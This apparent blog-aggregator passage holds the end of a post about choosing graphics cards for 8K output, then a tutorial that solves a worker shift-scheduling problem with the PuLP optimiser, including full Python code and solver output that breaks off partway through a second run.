My Lemmy post was about what video cards to buy. I was looking at the Gigabyte RX 6400 Eagle 4G as a cheap card from a local store that does 8K, it also does DisplayPort 1.4 so might have the same issues, also apparently FOSS drivers don’t support 8K on HDMI because the people who manage HDMI specs are jerks. It’s a $200 card at MSY and a bit less on ebay so it’s an amount I can afford to risk on a product that might not do what I want, but it seems to have a high probability of getting the same result. The NVidia cards have the option of proprietary drivers which allow using HDMI and there are cards with DisplayPort 1.4 (which can do 8K@30Hz) and HDMI 2.1 (which can do 8K@50Hz). So HDMI is a better option for some cards just based on card output and has the additional benefit of not needing DisplayPort to HDMI conversion.
The best option apparently is the Intel cards, which do DisplayPort internally and convert to HDMI in hardware, avoiding the issue of FOSS drivers for HDMI at 8K. The Intel Arc B580 has nice specs [6]: HDMI 2.1a and DisplayPort 2.1 output, 12G of RAM, and it’s faster than low end cards like the RX 6400. But the local computer store price is $470 and the ebay price is a bit over $400. If it turns out not to do what I need, it will still be a long way from the worst way I’ve wasted money on computer gear. But I’m still hesitating about this.
Any suggestions?
06 March, 2025 10:53AM by etbe
I recently used the PuLP modeler to solve a work scheduling problem to assign workers to shifts. Here are notes about doing that. This is a common use case, but isn't explicitly covered in the case studies in the PuLP documentation.
Here's the problem:
The tool is supposed to allocate workers to the shifts to try to cover all the shifts, give everybody work, and try to match their preferences. I implemented the tool:
#!/usr/bin/python3 import sys import os import re def report_solution_to_console(vars): for w in days_of_week: annotation = '' if human_annotate is not None: for s in shifts.keys(): m = re.match(rf'{w} - ', s) if not m: continue if vars[human_annotate][s].value(): annotation = f" ({human_annotate} SCHEDULED)" break if not len(annotation): annotation = f" ({human_annotate} OFF)" print(f"{w}{annotation}") for s in shifts.keys(): m = re.match(rf'{w} - ', s) if not m: continue annotation = '' if human_annotate is not None: annotation = f" ({human_annotate} {shifts[s][human_annotate]})" print(f" ---- {s[m.end():]}{annotation}") for h in humans: if vars[h][s].value(): print(f" {h} ({shifts[s][h]})") def report_solution_summary_to_console(vars): print("\nSUMMARY") for h in humans: print(f"-- {h}") print(f" benefit: {benefits[h].value():.3f}") counts = dict() for a in availabilities: counts[a] = 0 for s in shifts.keys(): if vars[h][s].value(): counts[shifts[s][h]] += 1 for a in availabilities: print(f" {counts[a]} {a}") human_annotate = None days_of_week = ('SUNDAY', 'MONDAY', 'TUESDAY', 'WEDNESDAY', 'THURSDAY', 'FRIDAY', 'SATURDAY') humans = ['ALICE', 'BOB', 'CAROL', 'DAVID', 'EVE', 'FRANK', 'GRACE', 'HEIDI', 'IVAN', 'JUDY'] shifts = {'SUNDAY - SANDING 9:00 AM - 4:00 PM': {'ALICE': 'NEUTRAL', 'BOB': 'NEUTRAL', 'CAROL': 'PREFERRED', 'DAVID': 'PREFERRED', 'EVE': 'PREFERRED', 'FRANK': 'PREFERRED', 'GRACE': 'DISFAVORED', 'HEIDI': 'DISFAVORED', 'IVAN': 'PREFERRED', 'JUDY': 'NEUTRAL'}, 'WEDNESDAY - SAWING 7:30 AM - 2:30 PM': {'ALICE': 'NEUTRAL', 'BOB': 'NEUTRAL', 'CAROL': 'PREFERRED', 'DAVID': 'PREFERRED', 'FRANK': 'PREFERRED', 'GRACE': 'NEUTRAL', 'HEIDI': 'DISFAVORED', 'IVAN': 'PREFERRED', 'EVE': 'REFUSED', 'JUDY': 'REFUSED'}, 'THURSDAY - SANDING 9:00 AM - 4:00 PM': {'ALICE': 'NEUTRAL', 'BOB': 'NEUTRAL', 'CAROL': 'PREFERRED', 'DAVID': 'PREFERRED', 'EVE': 'PREFERRED', 'FRANK': 'PREFERRED', 'GRACE': 'PREFERRED', 'HEIDI': 'DISFAVORED', 'IVAN': 'PREFERRED', 'JUDY': 'PREFERRED'}, 
'SATURDAY - SAWING 7:30 AM - 2:30 PM': {'ALICE': 'NEUTRAL', 'BOB': 'NEUTRAL', 'CAROL': 'PREFERRED', 'DAVID': 'PREFERRED', 'FRANK': 'PREFERRED', 'HEIDI': 'DISFAVORED', 'IVAN': 'PREFERRED', 'EVE': 'REFUSED', 'JUDY': 'REFUSED', 'GRACE': 'REFUSED'}, 'SUNDAY - SAWING 9:00 AM - 4:00 PM': {'ALICE': 'NEUTRAL', 'BOB': 'NEUTRAL', 'CAROL': 'PREFERRED', 'DAVID': 'PREFERRED', 'EVE': 'PREFERRED', 'FRANK': 'PREFERRED', 'GRACE': 'DISFAVORED', 'IVAN': 'PREFERRED', 'JUDY': 'PREFERRED', 'HEIDI': 'REFUSED'}, 'MONDAY - SAWING 9:00 AM - 4:00 PM': {'ALICE': 'NEUTRAL', 'BOB': 'NEUTRAL', 'CAROL': 'PREFERRED', 'DAVID': 'PREFERRED', 'EVE': 'PREFERRED', 'FRANK': 'PREFERRED', 'GRACE': 'PREFERRED', 'IVAN': 'PREFERRED', 'JUDY': 'PREFERRED', 'HEIDI': 'REFUSED'}, 'TUESDAY - SAWING 9:00 AM - 4:00 PM': {'ALICE': 'NEUTRAL', 'BOB': 'NEUTRAL', 'CAROL': 'PREFERRED', 'DAVID': 'PREFERRED', 'EVE': 'PREFERRED', 'FRANK': 'PREFERRED', 'GRACE': 'NEUTRAL', 'IVAN': 'PREFERRED', 'JUDY': 'PREFERRED', 'HEIDI': 'REFUSED'}, 'WEDNESDAY - PAINTING 7:30 AM - 2:30 PM': {'ALICE': 'NEUTRAL', 'BOB': 'NEUTRAL', 'CAROL': 'PREFERRED', 'FRANK': 'PREFERRED', 'GRACE': 'NEUTRAL', 'HEIDI': 'DISFAVORED', 'IVAN': 'PREFERRED', 'EVE': 'REFUSED', 'JUDY': 'REFUSED', 'DAVID': 'REFUSED'}, 'THURSDAY - SAWING 9:00 AM - 4:00 PM': {'ALICE': 'NEUTRAL', 'BOB': 'NEUTRAL', 'CAROL': 'PREFERRED', 'DAVID': 'PREFERRED', 'EVE': 'PREFERRED', 'FRANK': 'PREFERRED', 'GRACE': 'PREFERRED', 'IVAN': 'PREFERRED', 'JUDY': 'PREFERRED', 'HEIDI': 'REFUSED'}, 'FRIDAY - SAWING 9:00 AM - 4:00 PM': {'ALICE': 'NEUTRAL', 'BOB': 'NEUTRAL', 'CAROL': 'PREFERRED', 'DAVID': 'PREFERRED', 'EVE': 'PREFERRED', 'FRANK': 'PREFERRED', 'GRACE': 'PREFERRED', 'IVAN': 'PREFERRED', 'JUDY': 'DISFAVORED', 'HEIDI': 'REFUSED'}, 'SATURDAY - PAINTING 7:30 AM - 2:30 PM': {'ALICE': 'NEUTRAL', 'BOB': 'NEUTRAL', 'CAROL': 'PREFERRED', 'FRANK': 'PREFERRED', 'HEIDI': 'DISFAVORED', 'IVAN': 'PREFERRED', 'EVE': 'REFUSED', 'JUDY': 'REFUSED', 'GRACE': 'REFUSED', 'DAVID': 'REFUSED'}, 'SUNDAY - PAINTING 
9:45 AM - 4:45 PM': {'ALICE': 'NEUTRAL', 'BOB': 'NEUTRAL', 'CAROL': 'NEUTRAL', 'EVE': 'PREFERRED', 'FRANK': 'PREFERRED', 'GRACE': 'DISFAVORED', 'IVAN': 'PREFERRED', 'JUDY': 'PREFERRED', 'HEIDI': 'REFUSED', 'DAVID': 'REFUSED'}, 'MONDAY - PAINTING 9:45 AM - 4:45 PM': {'ALICE': 'NEUTRAL', 'BOB': 'NEUTRAL', 'CAROL': 'NEUTRAL', 'EVE': 'PREFERRED', 'FRANK': 'PREFERRED', 'GRACE': 'PREFERRED', 'IVAN': 'PREFERRED', 'JUDY': 'NEUTRAL', 'HEIDI': 'REFUSED', 'DAVID': 'REFUSED'}, 'TUESDAY - PAINTING 9:45 AM - 4:45 PM': {'ALICE': 'NEUTRAL', 'BOB': 'NEUTRAL', 'CAROL': 'NEUTRAL', 'EVE': 'PREFERRED', 'FRANK': 'PREFERRED', 'GRACE': 'NEUTRAL', 'IVAN': 'PREFERRED', 'JUDY': 'PREFERRED', 'HEIDI': 'REFUSED', 'DAVID': 'REFUSED'}, 'WEDNESDAY - SANDING 9:45 AM - 4:45 PM': {'ALICE': 'NEUTRAL', 'BOB': 'NEUTRAL', 'CAROL': 'NEUTRAL', 'DAVID': 'PREFERRED', 'FRANK': 'PREFERRED', 'GRACE': 'NEUTRAL', 'HEIDI': 'DISFAVORED', 'IVAN': 'PREFERRED', 'JUDY': 'NEUTRAL', 'EVE': 'REFUSED'}, 'THURSDAY - PAINTING 9:45 AM - 4:45 PM': {'ALICE': 'NEUTRAL', 'BOB': 'NEUTRAL', 'CAROL': 'NEUTRAL', 'EVE': 'PREFERRED', 'FRANK': 'PREFERRED', 'GRACE': 'NEUTRAL', 'IVAN': 'PREFERRED', 'JUDY': 'PREFERRED', 'HEIDI': 'REFUSED', 'DAVID': 'REFUSED'}, 'FRIDAY - PAINTING 9:45 AM - 4:45 PM': {'ALICE': 'NEUTRAL', 'BOB': 'NEUTRAL', 'CAROL': 'NEUTRAL', 'EVE': 'PREFERRED', 'FRANK': 'PREFERRED', 'GRACE': 'PREFERRED', 'IVAN': 'PREFERRED', 'JUDY': 'DISFAVORED', 'HEIDI': 'REFUSED', 'DAVID': 'REFUSED'}, 'SATURDAY - SANDING 9:45 AM - 4:45 PM': {'ALICE': 'NEUTRAL', 'BOB': 'NEUTRAL', 'CAROL': 'NEUTRAL', 'DAVID': 'PREFERRED', 'FRANK': 'PREFERRED', 'HEIDI': 'DISFAVORED', 'IVAN': 'PREFERRED', 'EVE': 'REFUSED', 'JUDY': 'REFUSED', 'GRACE': 'REFUSED'}, 'SUNDAY - PAINTING 11:00 AM - 6:00 PM': {'ALICE': 'NEUTRAL', 'BOB': 'NEUTRAL', 'CAROL': 'NEUTRAL', 'EVE': 'DISFAVORED', 'FRANK': 'NEUTRAL', 'GRACE': 'NEUTRAL', 'HEIDI': 'PREFERRED', 'IVAN': 'NEUTRAL', 'JUDY': 'NEUTRAL', 'DAVID': 'REFUSED'}, 'MONDAY - PAINTING 12:00 PM - 7:00 PM': {'ALICE': 'NEUTRAL', 
'BOB': 'NEUTRAL', 'CAROL': 'NEUTRAL', 'EVE': 'DISFAVORED', 'FRANK': 'NEUTRAL', 'GRACE': 'PREFERRED', 'IVAN': 'NEUTRAL', 'JUDY': 'NEUTRAL', 'HEIDI': 'REFUSED', 'DAVID': 'REFUSED'}, 'TUESDAY - PAINTING 12:00 PM - 7:00 PM': {'ALICE': 'NEUTRAL', 'BOB': 'NEUTRAL', 'CAROL': 'NEUTRAL', 'EVE': 'DISFAVORED', 'FRANK': 'NEUTRAL', 'GRACE': 'NEUTRAL', 'IVAN': 'NEUTRAL', 'HEIDI': 'REFUSED', 'JUDY': 'REFUSED', 'DAVID': 'REFUSED'}, 'WEDNESDAY - PAINTING 12:00 PM - 7:00 PM': {'ALICE': 'NEUTRAL', 'BOB': 'NEUTRAL', 'CAROL': 'NEUTRAL', 'FRANK': 'NEUTRAL', 'GRACE': 'NEUTRAL', 'IVAN': 'NEUTRAL', 'JUDY': 'PREFERRED', 'EVE': 'REFUSED', 'HEIDI': 'REFUSED', 'DAVID': 'REFUSED'}, 'THURSDAY - PAINTING 12:00 PM - 7:00 PM': {'ALICE': 'NEUTRAL', 'BOB': 'NEUTRAL', 'CAROL': 'NEUTRAL', 'EVE': 'DISFAVORED', 'FRANK': 'NEUTRAL', 'GRACE': 'NEUTRAL', 'IVAN': 'NEUTRAL', 'JUDY': 'PREFERRED', 'HEIDI': 'REFUSED', 'DAVID': 'REFUSED'}, 'FRIDAY - PAINTING 12:00 PM - 7:00 PM': {'ALICE': 'NEUTRAL', 'BOB': 'NEUTRAL', 'CAROL': 'NEUTRAL', 'EVE': 'DISFAVORED', 'FRANK': 'NEUTRAL', 'GRACE': 'NEUTRAL', 'IVAN': 'NEUTRAL', 'JUDY': 'DISFAVORED', 'HEIDI': 'REFUSED', 'DAVID': 'REFUSED'}, 'SATURDAY - PAINTING 12:00 PM - 7:00 PM': {'ALICE': 'NEUTRAL', 'BOB': 'NEUTRAL', 'CAROL': 'NEUTRAL', 'FRANK': 'NEUTRAL', 'IVAN': 'NEUTRAL', 'JUDY': 'DISFAVORED', 'EVE': 'REFUSED', 'HEIDI': 'REFUSED', 'GRACE': 'REFUSED', 'DAVID': 'REFUSED'}, 'SUNDAY - SAWING 12:00 PM - 7:00 PM': {'ALICE': 'PREFERRED', 'BOB': 'PREFERRED', 'CAROL': 'NEUTRAL', 'EVE': 'DISFAVORED', 'FRANK': 'NEUTRAL', 'GRACE': 'NEUTRAL', 'IVAN': 'NEUTRAL', 'JUDY': 'PREFERRED', 'HEIDI': 'REFUSED', 'DAVID': 'REFUSED'}, 'MONDAY - SAWING 2:00 PM - 9:00 PM': {'ALICE': 'PREFERRED', 'BOB': 'PREFERRED', 'CAROL': 'DISFAVORED', 'EVE': 'DISFAVORED', 'FRANK': 'NEUTRAL', 'GRACE': 'NEUTRAL', 'IVAN': 'DISFAVORED', 'JUDY': 'DISFAVORED', 'HEIDI': 'REFUSED', 'DAVID': 'REFUSED'}, 'TUESDAY - SAWING 2:00 PM - 9:00 PM': {'ALICE': 'PREFERRED', 'BOB': 'PREFERRED', 'CAROL': 'DISFAVORED', 'EVE': 
'DISFAVORED', 'FRANK': 'NEUTRAL', 'GRACE': 'NEUTRAL', 'IVAN': 'DISFAVORED', 'HEIDI': 'REFUSED', 'JUDY': 'REFUSED', 'DAVID': 'REFUSED'}, 'WEDNESDAY - SAWING 2:00 PM - 9:00 PM': {'ALICE': 'PREFERRED', 'BOB': 'PREFERRED', 'CAROL': 'DISFAVORED', 'FRANK': 'NEUTRAL', 'GRACE': 'NEUTRAL', 'IVAN': 'DISFAVORED', 'JUDY': 'DISFAVORED', 'EVE': 'REFUSED', 'HEIDI': 'REFUSED', 'DAVID': 'REFUSED'}, 'THURSDAY - SAWING 2:00 PM - 9:00 PM': {'ALICE': 'PREFERRED', 'BOB': 'PREFERRED', 'CAROL': 'DISFAVORED', 'EVE': 'DISFAVORED', 'FRANK': 'NEUTRAL', 'GRACE': 'NEUTRAL', 'IVAN': 'DISFAVORED', 'JUDY': 'DISFAVORED', 'HEIDI': 'REFUSED', 'DAVID': 'REFUSED'}, 'FRIDAY - SAWING 2:00 PM - 9:00 PM': {'ALICE': 'PREFERRED', 'BOB': 'PREFERRED', 'CAROL': 'DISFAVORED', 'EVE': 'DISFAVORED', 'FRANK': 'NEUTRAL', 'GRACE': 'NEUTRAL', 'IVAN': 'DISFAVORED', 'HEIDI': 'REFUSED', 'JUDY': 'REFUSED', 'DAVID': 'REFUSED'}, 'SATURDAY - SAWING 2:00 PM - 9:00 PM': {'ALICE': 'PREFERRED', 'BOB': 'PREFERRED', 'CAROL': 'DISFAVORED', 'FRANK': 'NEUTRAL', 'IVAN': 'DISFAVORED', 'JUDY': 'DISFAVORED', 'EVE': 'REFUSED', 'HEIDI': 'REFUSED', 'GRACE': 'REFUSED', 'DAVID': 'REFUSED'}, 'SUNDAY - PAINTING 12:15 PM - 7:15 PM': {'ALICE': 'NEUTRAL', 'BOB': 'NEUTRAL', 'CAROL': 'PREFERRED', 'EVE': 'DISFAVORED', 'FRANK': 'NEUTRAL', 'GRACE': 'NEUTRAL', 'HEIDI': 'NEUTRAL', 'IVAN': 'DISFAVORED', 'JUDY': 'NEUTRAL', 'DAVID': 'REFUSED'}, 'MONDAY - PAINTING 2:00 PM - 9:00 PM': {'ALICE': 'NEUTRAL', 'BOB': 'NEUTRAL', 'CAROL': 'DISFAVORED', 'EVE': 'DISFAVORED', 'FRANK': 'NEUTRAL', 'GRACE': 'NEUTRAL', 'HEIDI': 'NEUTRAL', 'IVAN': 'DISFAVORED', 'JUDY': 'DISFAVORED', 'DAVID': 'REFUSED'}, 'TUESDAY - PAINTING 2:00 PM - 9:00 PM': {'ALICE': 'NEUTRAL', 'BOB': 'NEUTRAL', 'CAROL': 'DISFAVORED', 'EVE': 'DISFAVORED', 'FRANK': 'NEUTRAL', 'GRACE': 'NEUTRAL', 'HEIDI': 'NEUTRAL', 'IVAN': 'DISFAVORED', 'JUDY': 'REFUSED', 'DAVID': 'REFUSED'}, 'WEDNESDAY - PAINTING 2:00 PM - 9:00 PM': {'ALICE': 'NEUTRAL', 'BOB': 'NEUTRAL', 'CAROL': 'DISFAVORED', 'FRANK': 'NEUTRAL', 'GRACE': 
'NEUTRAL', 'HEIDI': 'NEUTRAL', 'IVAN': 'DISFAVORED', 'JUDY': 'DISFAVORED', 'EVE': 'REFUSED', 'DAVID': 'REFUSED'}, 'THURSDAY - PAINTING 2:00 PM - 9:00 PM': {'ALICE': 'NEUTRAL', 'BOB': 'NEUTRAL', 'CAROL': 'DISFAVORED', 'EVE': 'DISFAVORED', 'FRANK': 'NEUTRAL', 'GRACE': 'NEUTRAL', 'HEIDI': 'NEUTRAL', 'IVAN': 'DISFAVORED', 'JUDY': 'DISFAVORED', 'DAVID': 'REFUSED'}, 'FRIDAY - PAINTING 2:00 PM - 9:00 PM': {'ALICE': 'NEUTRAL', 'BOB': 'NEUTRAL', 'CAROL': 'DISFAVORED', 'EVE': 'DISFAVORED', 'FRANK': 'NEUTRAL', 'GRACE': 'NEUTRAL', 'HEIDI': 'NEUTRAL', 'IVAN': 'DISFAVORED', 'JUDY': 'REFUSED', 'DAVID': 'REFUSED'}, 'SATURDAY - PAINTING 2:00 PM - 9:00 PM': {'ALICE': 'NEUTRAL', 'BOB': 'NEUTRAL', 'CAROL': 'DISFAVORED', 'FRANK': 'NEUTRAL', 'HEIDI': 'NEUTRAL', 'IVAN': 'DISFAVORED', 'JUDY': 'DISFAVORED', 'EVE': 'REFUSED', 'GRACE': 'REFUSED', 'DAVID': 'REFUSED'}} availabilities = ['PREFERRED', 'NEUTRAL', 'DISFAVORED'] import pulp prob = pulp.LpProblem("Scheduling", pulp.LpMaximize) vars = pulp.LpVariable.dicts("Assignments", (humans, shifts.keys()), None,None, # bounds; unused, since these are binary variables pulp.LpBinary) # Everyone works at least 2 shifts Nshifts_min = 2 for h in humans: prob += ( pulp.lpSum([vars[h][s] for s in shifts.keys()]) >= Nshifts_min, f"{h} works at least {Nshifts_min} shifts", ) # each shift is ~ 8 hours, so I limit everyone to 40/8 = 5 shifts Nshifts_max = 5 for h in humans: prob += ( pulp.lpSum([vars[h][s] for s in shifts.keys()]) <= Nshifts_max, f"{h} works at most {Nshifts_max} shifts", ) # all shifts staffed and not double-staffed for s in shifts.keys(): prob += ( pulp.lpSum([vars[h][s] for h in humans]) == 1, f"{s} is staffed", ) # each human can work at most one shift on any given day for w in days_of_week: for h in humans: prob += ( pulp.lpSum([vars[h][s] for s in shifts.keys() if re.match(rf'{w} ',s)]) <= 1, f"{h} cannot be double-booked on {w}" ) #### Some explicit constraints; as an example # DAVID can't work any PAINTING shift and is off on Thu 
and Sun h = 'DAVID' prob += ( pulp.lpSum([vars[h][s] for s in shifts.keys() if re.search(r'- PAINTING',s)]) == 0, f"{h} can't work any PAINTING shift" ) prob += ( pulp.lpSum([vars[h][s] for s in shifts.keys() if re.match(r'THURSDAY|SUNDAY',s)]) == 0, f"{h} is off on Thursday and Sunday" ) # Do not assign any "REFUSED" shifts for s in shifts.keys(): for h in humans: if shifts[s][h] == 'REFUSED': prob += ( vars[h][s] == 0, f"{h} is not available for {s}" ) # Objective. I try to maximize the "happiness". Each human sees each shift as # one of: # # PREFERRED # NEUTRAL # DISFAVORED # REFUSED # # I set a hard constraint to handle "REFUSED", and arbitrarily, I set these # benefit values for the others benefit_availability = dict() benefit_availability['PREFERRED'] = 3 benefit_availability['NEUTRAL'] = 2 benefit_availability['DISFAVORED'] = 1 # Not used, since this is a hard constraint. But the code needs this to be a # part of the benefit. I can ignore these in the code, but let's keep this # simple benefit_availability['REFUSED' ] = -1000 benefits = dict() for h in humans: benefits[h] = \ pulp.lpSum([vars[h][s] * benefit_availability[shifts[s][h]] \ for s in shifts.keys()]) benefit_total = \ pulp.lpSum([benefits[h] \ for h in humans]) prob += ( benefit_total, "happiness", ) prob.solve() if pulp.LpStatus[prob.status] == "Optimal": report_solution_to_console(vars) report_solution_summary_to_console(vars)
The set of workers is in the humans variable, and the shift schedule and the workers' preferences are encoded in the shifts dict. The problem is defined by a vars dict of dicts, each a boolean variable indicating whether a particular worker is scheduled for a particular shift. We define a set of constraints on these worker allocations to restrict ourselves to valid solutions. And among these valid solutions, we try to find the one that maximizes some benefit function, defined here as:
benefit_availability = dict()
benefit_availability['PREFERRED']  = 3
benefit_availability['NEUTRAL']    = 2
benefit_availability['DISFAVORED'] = 1

benefits = dict()
for h in humans:
    benefits[h] = \
        pulp.lpSum([vars[h][s] * benefit_availability[shifts[s][h]] \
                    for s in shifts.keys()])

benefit_total = \
    pulp.lpSum([benefits[h] \
                for h in humans])
So for instance each shift that was scheduled as somebody's PREFERRED shift gives us 3 benefit points. And if all the shifts ended up being PREFERRED, we'd have a total benefit value of 3*Nshifts. This is impossible, however, because that would violate some constraints in the problem.
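We can check that arithmetic against the solver's SUMMARY below; the per-worker (PREFERRED, NEUTRAL, DISFAVORED) counts here are copied from that output:

```python
# (PREFERRED, NEUTRAL, DISFAVORED) counts per worker, from the SUMMARY:
counts = {'ALICE': (3, 2, 0), 'BOB':   (4, 1, 0), 'CAROL': (3, 0, 0),
          'DAVID': (5, 0, 0), 'EVE':   (3, 0, 0), 'FRANK': (3, 2, 0),
          'GRACE': (2, 1, 0), 'HEIDI': (1, 3, 0), 'IVAN':  (4, 0, 0),
          'JUDY':  (2, 0, 0)}
total   = sum(3*p + 2*n + 1*d for p, n, d in counts.values())
nshifts = sum(p + n + d       for p, n, d in counts.values())
print(total, nshifts, 3 * nshifts)  # 108 39 117: we land 9 points below the bound
```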
The exact trade-off between the different preferences is set in the benefit_availability dict. With the above numbers, it's equally good for somebody to have a NEUTRAL shift and a day off as it is for them to have two DISFAVORED shifts. If we really want to encourage the program to work people as much as possible (days off discouraged), we'd want to raise the DISFAVORED value.
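A quick illustration of that indifference, and of how raising the DISFAVORED value tilts it (the 1.5 is an arbitrary example value):

```python
points = {'PREFERRED': 3, 'NEUTRAL': 2, 'DISFAVORED': 1}

# One NEUTRAL shift plus a day off scores the same as two DISFAVORED shifts:
print(points['NEUTRAL'] == 2 * points['DISFAVORED'])  # True: solver is indifferent

# Raising DISFAVORED makes working extra (disliked) shifts strictly better:
points['DISFAVORED'] = 1.5
print(2 * points['DISFAVORED'] > points['NEUTRAL'])   # True
```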
I run this program and I get:
.... Result - Optimal solution found Objective value: 108.00000000 Enumerated nodes: 0 Total iterations: 0 Time (CPU seconds): 0.01 Time (Wallclock seconds): 0.01 Option for printingOptions changed from normal to all Total time (CPU seconds): 0.02 (Wallclock seconds): 0.02 SUNDAY ---- SANDING 9:00 AM - 4:00 PM EVE (PREFERRED) ---- SAWING 9:00 AM - 4:00 PM IVAN (PREFERRED) ---- PAINTING 9:45 AM - 4:45 PM FRANK (PREFERRED) ---- PAINTING 11:00 AM - 6:00 PM HEIDI (PREFERRED) ---- SAWING 12:00 PM - 7:00 PM ALICE (PREFERRED) ---- PAINTING 12:15 PM - 7:15 PM CAROL (PREFERRED) MONDAY ---- SAWING 9:00 AM - 4:00 PM DAVID (PREFERRED) ---- PAINTING 9:45 AM - 4:45 PM IVAN (PREFERRED) ---- PAINTING 12:00 PM - 7:00 PM GRACE (PREFERRED) ---- SAWING 2:00 PM - 9:00 PM ALICE (PREFERRED) ---- PAINTING 2:00 PM - 9:00 PM HEIDI (NEUTRAL) TUESDAY ---- SAWING 9:00 AM - 4:00 PM DAVID (PREFERRED) ---- PAINTING 9:45 AM - 4:45 PM EVE (PREFERRED) ---- PAINTING 12:00 PM - 7:00 PM FRANK (NEUTRAL) ---- SAWING 2:00 PM - 9:00 PM BOB (PREFERRED) ---- PAINTING 2:00 PM - 9:00 PM HEIDI (NEUTRAL) WEDNESDAY ---- SAWING 7:30 AM - 2:30 PM DAVID (PREFERRED) ---- PAINTING 7:30 AM - 2:30 PM IVAN (PREFERRED) ---- SANDING 9:45 AM - 4:45 PM FRANK (PREFERRED) ---- PAINTING 12:00 PM - 7:00 PM JUDY (PREFERRED) ---- SAWING 2:00 PM - 9:00 PM BOB (PREFERRED) ---- PAINTING 2:00 PM - 9:00 PM ALICE (NEUTRAL) THURSDAY ---- SANDING 9:00 AM - 4:00 PM GRACE (PREFERRED) ---- SAWING 9:00 AM - 4:00 PM CAROL (PREFERRED) ---- PAINTING 9:45 AM - 4:45 PM EVE (PREFERRED) ---- PAINTING 12:00 PM - 7:00 PM JUDY (PREFERRED) ---- SAWING 2:00 PM - 9:00 PM BOB (PREFERRED) ---- PAINTING 2:00 PM - 9:00 PM ALICE (NEUTRAL) FRIDAY ---- SAWING 9:00 AM - 4:00 PM DAVID (PREFERRED) ---- PAINTING 9:45 AM - 4:45 PM FRANK (PREFERRED) ---- PAINTING 12:00 PM - 7:00 PM GRACE (NEUTRAL) ---- SAWING 2:00 PM - 9:00 PM BOB (PREFERRED) ---- PAINTING 2:00 PM - 9:00 PM HEIDI (NEUTRAL) SATURDAY ---- SAWING 7:30 AM - 2:30 PM CAROL (PREFERRED) ---- PAINTING 7:30 AM 
- 2:30 PM IVAN (PREFERRED) ---- SANDING 9:45 AM - 4:45 PM DAVID (PREFERRED) ---- PAINTING 12:00 PM - 7:00 PM FRANK (NEUTRAL) ---- SAWING 2:00 PM - 9:00 PM ALICE (PREFERRED) ---- PAINTING 2:00 PM - 9:00 PM BOB (NEUTRAL) SUMMARY -- ALICE benefit: 13.000 3 PREFERRED 2 NEUTRAL 0 DISFAVORED -- BOB benefit: 14.000 4 PREFERRED 1 NEUTRAL 0 DISFAVORED -- CAROL benefit: 9.000 3 PREFERRED 0 NEUTRAL 0 DISFAVORED -- DAVID benefit: 15.000 5 PREFERRED 0 NEUTRAL 0 DISFAVORED -- EVE benefit: 9.000 3 PREFERRED 0 NEUTRAL 0 DISFAVORED -- FRANK benefit: 13.000 3 PREFERRED 2 NEUTRAL 0 DISFAVORED -- GRACE benefit: 8.000 2 PREFERRED 1 NEUTRAL 0 DISFAVORED -- HEIDI benefit: 9.000 1 PREFERRED 3 NEUTRAL 0 DISFAVORED -- IVAN benefit: 12.000 4 PREFERRED 0 NEUTRAL 0 DISFAVORED -- JUDY benefit: 6.000 2 PREFERRED 0 NEUTRAL 0 DISFAVORED
So we have a solution! We have 108 total benefit points. But it looks a bit uneven: Judy only works 2 days, while some people work many more: David works 5, for instance. Why is that? I update the program with human_annotate = 'JUDY', run it again, and it tells me more about Judy's preferences:
Objective value:                108.00000000
Enumerated nodes:               0
Total iterations:               0
Time (CPU seconds):             0.01
Time (Wallclock seconds):       0.01

Option for printingOptions changed from normal to all
Total time (CPU seconds):       0.01   (Wallclock seconds):       0.02

SUNDAY (JUDY OFF)
---- SANDING 9:00 AM - 4:00 PM (JUDY NEUTRAL) EVE (PREFERRED)
---- SAWING 9:00 AM - 4:00 PM (JUDY PREFERRED) IVAN (PREFERRED)
---- PAINTING 9:45 AM - 4:45 PM (JUDY PREFERRED) FRANK (PREFERRED)
---- PAINTING 11:00 AM - 6:00 PM (JUDY NEUTRAL) HEIDI (PREFERRED)
---- SAWING 12:00 PM - 7:00 PM (JUDY PREFERRED) ALICE (PREFERRED)
---- PAINTING 12:15 PM - 7:15 PM (JUDY NEUTRAL) CAROL (PREFERRED)
MONDAY (JUDY OFF)
---- SAWING 9:00 AM - 4:00 PM (JUDY PREFERRED) DAVID (PREFERRED)
---- PAINTING 9:45 AM - 4:45 PM (JUDY NEUTRAL) IVAN (PREFERRED)
---- PAINTING 12:00 PM - 7:00 PM (JUDY NEUTRAL) GRACE (PREFERRED)
---- SAWING 2:00 PM - 9:00 PM (JUDY DISFAVORED) ALICE (PREFERRED)
---- PAINTING 2:00 PM - 9:00 PM (JUDY DISFAVORED) HEIDI (NEUTRAL)
TUESDAY (JUDY OFF)
---- SAWING 9:00 AM - 4:00 PM (JUDY PREFERRED) DAVID (PREFERRED)
---- PAINTING 9:45 AM - 4:45 PM (JUDY PREFERRED) EVE (PREFERRED)
---- PAINTING 12:00 PM - 7:00 PM (JUDY REFUSED) FRANK (NEUTRAL)
---- SAWING 2:00 PM - 9:00 PM (JUDY REFUSED) BOB (PREFERRED)
---- PAINTING 2:00 PM - 9:00 PM (JUDY REFUSED) HEIDI (NEUTRAL)
WEDNESDAY (JUDY SCHEDULED)
---- SAWING 7:30 AM - 2:30 PM (JUDY REFUSED) DAVID (PREFERRED)
---- PAINTING 7:30 AM - 2:30 PM (JUDY REFUSED) IVAN (PREFERRED)
---- SANDING 9:45 AM - 4:45 PM (JUDY NEUTRAL) FRANK (PREFERRED)
---- PAINTING 12:00 PM - 7:00 PM (JUDY PREFERRED) JUDY (PREFERRED)
---- SAWING 2:00 PM - 9:00 PM (JUDY DISFAVORED) BOB (PREFERRED)
---- PAINTING 2:00 PM - 9:00 PM (JUDY DISFAVORED) ALICE (NEUTRAL)
THURSDAY (JUDY SCHEDULED)
---- SANDING 9:00 AM - 4:00 PM (JUDY PREFERRED) GRACE (PREFERRED)
---- SAWING 9:00 AM - 4:00 PM (JUDY PREFERRED) CAROL (PREFERRED)
---- PAINTING 9:45 AM - 4:45 PM (JUDY PREFERRED) EVE (PREFERRED)
---- PAINTING 12:00 PM - 7:00 PM (JUDY PREFERRED) JUDY (PREFERRED)
---- SAWING 2:00 PM - 9:00 PM (JUDY DISFAVORED) BOB (PREFERRED)
---- PAINTING 2:00 PM - 9:00 PM (JUDY DISFAVORED) ALICE (NEUTRAL)
FRIDAY (JUDY OFF)
---- SAWING 9:00 AM - 4:00 PM (JUDY DISFAVORED) DAVID (PREFERRED)
---- PAINTING 9:45 AM - 4:45 PM (JUDY DISFAVORED) FRANK (PREFERRED)
---- PAINTING 12:00 PM - 7:00 PM (JUDY DISFAVORED) GRACE (NEUTRAL)
